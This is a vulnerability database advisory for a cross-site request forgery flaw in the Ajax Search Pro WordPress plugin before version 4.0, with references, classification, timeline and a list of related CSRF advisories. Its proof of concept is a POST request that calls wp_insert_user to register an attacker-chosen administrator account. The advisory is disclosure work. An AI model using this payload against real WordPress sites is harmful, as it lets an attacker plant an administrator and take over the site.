Ajax Search Pro < 4.0 – Cross-Site Request Forgery (CSRF) Add User | Plugin Vulnerabilities

Description

The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) Add User security vulnerability.

Proof of Concept

This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

Affects Plugins

ajax-search-pro

Fixed in 4.0

References

URL

https://packetstormsecurity.com/files/#130955/

URL

https://web.archive.org/web/20150619084745/https://research.evex.pw/?vuln=9

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Submitter

A. Samman

Submitter twitter

Verified

No

WPVDB ID

37e6ebfc-a927-4d8b-85bf-e940ac16c604

Timeline

Publicly Published

2015-03-18 (about 11 years ago)

Added

2015-03-21 (about 11 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2020-09-16

Title

Feed Them Social < 2.8.7 - Cross-Site Request Forgery

Published

2023-11-14

Title

Big File Uploads < 2.1.2 - Cross-Site Request Forgery via actions

Published

2024-12-11

Title

HQ Rental Software <= 1.5.29 - Cross-Site Request Forgery to Arbitrary Options Update

Published

2025-03-28

Title

Simple Trackback Disabler <= 1.4 - Cross-Site Request Forgery

Published

2025-03-24

Title

Contact Form 7 Material Design <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting